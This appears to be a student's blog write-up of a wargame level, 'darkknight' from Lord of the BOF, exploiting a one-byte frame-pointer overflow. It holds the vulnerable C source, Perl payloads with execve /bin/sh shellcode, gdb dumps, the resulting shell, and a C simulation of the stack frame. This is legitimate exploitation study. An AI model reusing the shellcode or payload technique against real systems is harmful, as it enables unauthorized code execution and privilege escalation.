Whoa..
http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt
Read this. You'll get it right away.
Wow...
Wooow...
Staying up all night paid off?!
/*
The Lord of the BOF : The Fellowship of the BOF
- darkknight
- FPO
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy */
void problem_child(char *src)
{
    char buffer[40];
    strncpy(buffer, src, 41); /* strncpy(dest, source, #of bytes): copies 41 bytes from argv[1] into buffer.
                                 buffer is only 40 bytes, so the one extra byte overwrites (the low byte of)
                                 the saved frame pointer that is restored when this function returns to main */
    printf("%s\n", buffer);
}
int main(int argc, char *argv[])
{
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }
    problem_child(argv[1]);
    return 0;
}
[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`
ü ¿j
XRh//shh/binRSÍ̀ú ¿Mü ¿û ¿ @
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -q porkknight core
Core was generated by `./porkknight ü ¿j
XRh//shh/binRSÍ̀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xfc764000 in ?? ()
(gdb) x/40wx $esp
0xbffffa8e: 0xfaecbfff 0xd920bfff 0x43e04005 0xfab44001
0xbffffa9e: 0x6070bfff 0x69804006 0x85004010 0xfac40804
0xbffffaae: 0x81ecbfff 0xfaec4010 0x8466bfff 0x85000804
0xbffffabe: 0xfac40804 0xfc90bfff 0x9090bfff 0x90909090 // argv[1] is here (its copy in buffer, starting at 0xbffffac4; the dump is offset by 2 bytes because of the corrupted esp)
0xbfffface: 0x90909090 0x6a909090 0x5299580b 0x732f2f68
0xbffffade: 0x622f6868 0xe3896e69 0xe1895352 0xfa8680cd
0xbffffaee: 0x849ebfff 0xfc4d0804 0xfb18bfff 0x09cbbfff
0xbffffafe: 0x00024003 0xfb440000 0xfb50bfff 0x3868bfff
0xbffffb0e: 0x00024001 0x83900000 0x00000804 0x83b10000
0xbffffb1e: 0x846c0804 0x00020804 0xfb440000 0x82e4bfff
(gdb) q
[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
Illegal instruction (core dumped)
[golem@localhost golem]$ gdb -q a.out core
warning: core file may not match specified executable file.
Core was generated by `./porkknight úú ¿j
XRh//shh/binRSÍ̀À'.
Program terminated with signal 4, Illegal instruction.
#0 0xbffffac4 in ?? ()
(gdb) z
[1]+ Stopped gdb -q a.out core
[golem@localhost golem]$ gdb -q porkknight core
Core was generated by `./porkknight úú ¿j
XRh//shh/binRSÍ̀À'.
Program terminated with signal 4, Illegal instruction.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbffffac4 in ?? ()
(gdb) x/40wx $esp
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x580b6a90
0xbffffad8: 0x2f685299 0x6868732f 0x6e69622f 0x5352e389
0xbffffae8: 0x80cde189 0xbffffac0 0x0804849e 0xbffffc4d
0xbffffaf8: 0xbffffb18 0x400309cb 0x00000002 0xbffffb44
0xbffffb08: 0xbffffb50 0x40013868 0x00000002 0x08048390
0xbffffb18: 0x00000000 0x080483b1 0x0804846c 0x00000002
0xbffffb28: 0xbffffb44 0x080482e4 0x080484dc 0x4000ae60
0xbffffb38: 0xbffffb3c 0x40013e90 0x00000002 0xbffffc40
0xbffffb48: 0xbffffc4d 0x00000000 0xbffffc78 0xbffffc88
0xbffffb58: 0xbffffca0 0xbffffcbf 0xbffffce1 0xbffffcec
(gdb) q
[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
bash$ gjf
sh: gjf: command not found
bash$ exit
exit
[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
bash$ my-pass
euid = 512
Notes I took while working on this:
argv[1] = [an address inside the nop sled] [nop sled] [shellcode] [the byte that overflows the fp]
has to total 41 bytes
23 bytes (shellcode) + 4 bytes (argv[1] address) = 27 bytes
13 bytes (nop) makes 40, plus the 1 byte that reaches the frame pointer = 41
Even with nothing in the payload I got a segfault, so I traced it to see why: strncpy just keeps going and fills in the rest with garbage.. stupid stupid dumb strncpy
strace ./porkknight `perl -e 'print "AAAA"'` -i
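Here is a small model of what the notes above describe, written as an added example for this page (it is not the LOB binary and not code from the original write-up). It simulates problem_child()'s frame in an ordinary array using the addresses seen in the gdb dumps: buffer at 0xbffffac4, and main's ebp assumed to be 0xbffffaf8 (the word sitting just below the libc return address 0x400309cb in the second dump; only its top three bytes matter). It shows why a short argument like "AAAA" still crashes (strncpy pads the destination out to 41 bytes with NULs, so the 41st byte zeroes the low byte of saved ebp), why the 0xc0 attempt with address 0xbffffac4 jumped onto the address bytes themselves (Illegal instruction), and why 0xbffffacb lands in the NOP sled. Nothing here executes shellcode; it is pure address arithmetic on a copy of the frame:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    40            /* char buffer[40] in problem_child() */
#define COPY_LEN    41            /* strncpy(buffer, src, 41): the off-by-one */
#define NOP_COUNT   13
#define BUFFER_ADDR 0xbffffac4u   /* address of buffer, read from the dumps */
#define SAVED_EBP   0xbffffaf8u   /* main's ebp as saved in problem_child's frame (assumed from the dump) */

/* The 23-byte execve("/bin//sh") shellcode used in the post. */
static const unsigned char SHELLCODE[23] = {
    0x6a,0x0b,0x58,0x99,0x52,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,
    0x62,0x69,0x6e,0x89,0xe3,0x52,0x53,0x89,0xe1,0xcd,0x80
};

static uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void write_le32(unsigned char *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Count the NUL bytes strncpy writes for a short source: it pads the
 * destination out to n, so "AAAA" still clobbers the 41st byte (with 0x00). */
size_t strncpy_nul_padding(const char *src) {
    unsigned char dst[COPY_LEN];
    memset(dst, 0xaa, sizeof dst);
    strncpy((char *)dst, src, COPY_LEN);
    size_t nuls = 0;
    for (size_t i = 0; i < COPY_LEN; i++)
        if (dst[i] == 0) nuls++;
    return nuls;
}

/* Model of problem_child()'s frame: 40 bytes of buffer followed directly by the
 * 4-byte saved ebp (x86, little-endian). Run the binary's copy on it and
 * return the saved ebp afterwards. */
uint32_t saved_ebp_after_copy(const char *src, uint32_t saved_ebp) {
    unsigned char frame[BUF_SIZE + 4];
    memset(frame, 0xaa, sizeof frame);
    write_le32(frame + BUF_SIZE, saved_ebp);
    strncpy((char *)frame, src, COPY_LEN);       /* byte 40 = low byte of saved ebp */
    return read_le32(frame + BUF_SIZE);
}

/* Build argv[1] exactly as in the post: [addr][13 NOPs][shellcode][last_byte x2].
 * out needs room for 43 bytes (42 + NUL). Returns the payload length (42). */
size_t build_payload(char *out, uint32_t jump_addr, unsigned char last_byte) {
    unsigned char *p = (unsigned char *)out;
    write_le32(p, jump_addr);               p += 4;
    memset(p, 0x90, NOP_COUNT);             p += NOP_COUNT;
    memcpy(p, SHELLCODE, sizeof SHELLCODE); p += sizeof SHELLCODE;
    *p++ = last_byte;                       /* the 41st byte: copied onto saved ebp */
    *p++ = last_byte;                       /* the 42nd byte is never copied */
    *p = 0;
    return (size_t)(p - (unsigned char *)out);
}

/* After problem_child returns, main's epilogue runs  leave ; ret  =
 * mov esp,ebp ; pop ebp ; ret, so eip is loaded from the word at
 * (corrupted ebp + 4). Return that word if it lies inside buffer (and so is
 * attacker-controlled), or 0 if the fake frame points somewhere else. */
uint32_t simulate_attempt(uint32_t jump_addr, unsigned char last_byte) {
    char payload[64];
    build_payload(payload, jump_addr, last_byte);
    uint32_t ebp  = saved_ebp_after_copy(payload, SAVED_EBP);
    uint32_t slot = ebp + 4;
    if (slot < BUFFER_ADDR || slot + 4 > BUFFER_ADDR + BUF_SIZE)
        return 0;
    return read_le32((const unsigned char *)payload + (slot - BUFFER_ADDR));
}

/* 1 if target is inside the NOP sled in buffer (bytes 4..16), else 0. */
int lands_in_sled(uint32_t target) {
    return target >= BUFFER_ADDR + 4 && target < BUFFER_ADDR + 4 + NOP_COUNT;
}

int main(void) {
    printf("strncpy(\"AAAA\", 41) writes %zu NUL bytes; saved ebp becomes %#x\n",
           strncpy_nul_padding("AAAA"), saved_ebp_after_copy("AAAA", SAVED_EBP));
    printf("attempt 1 (0xbffffc90, last byte 0x86): eip slot outside buffer -> %#x\n",
           simulate_attempt(0xbffffc90u, 0x86));
    printf("attempt 2 (0xbffffac4, last byte 0xc0): eip <- %#x (the address bytes themselves)\n",
           simulate_attempt(0xbffffac4u, 0xc0));
    uint32_t t = simulate_attempt(0xbffffacbu, 0xc0);
    printf("attempt 3 (0xbffffacb, last byte 0xc0): eip <- %#x, in NOP sled: %d\n", t, lands_in_sled(t));
    return 0;
}
```

The 0x86 attempt returns 0 because ebp+4 = 0xbffffa8a lies below buffer, so the ret popped whatever happened to be there (the 0xfc764000 in the first core). The 0xc0 attempts both make ebp+4 equal to buffer itself, so eip is taken from the first four bytes of the payload; the only difference between them is whether that word points at the address bytes (c4 fa ff bf, an invalid instruction) or seven bytes further on, inside the 0x90s.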
The sheet I took notes on lol. It only looks like a lot of scribbles; my mom later threw it out, asking why it was so messy lololol
LeaveRet is glowing, can you see it
Feels good
Now I have to write an essay, two more pages, I'm doomed, it's 2 am, I have to print it too, doomed
At first I read the FPO document and still didn't get this problem, read the walkthrough and still didn't get it, so I just read the FPO document really carefully, and then the stack started to draw itself, I could follow ebp, I could picture what esp was doing, I could see the stack growing and what leave/ret does. Wow, this one was really something. In the end I didn't even remember the walkthrough and solved it on my own. I feel great.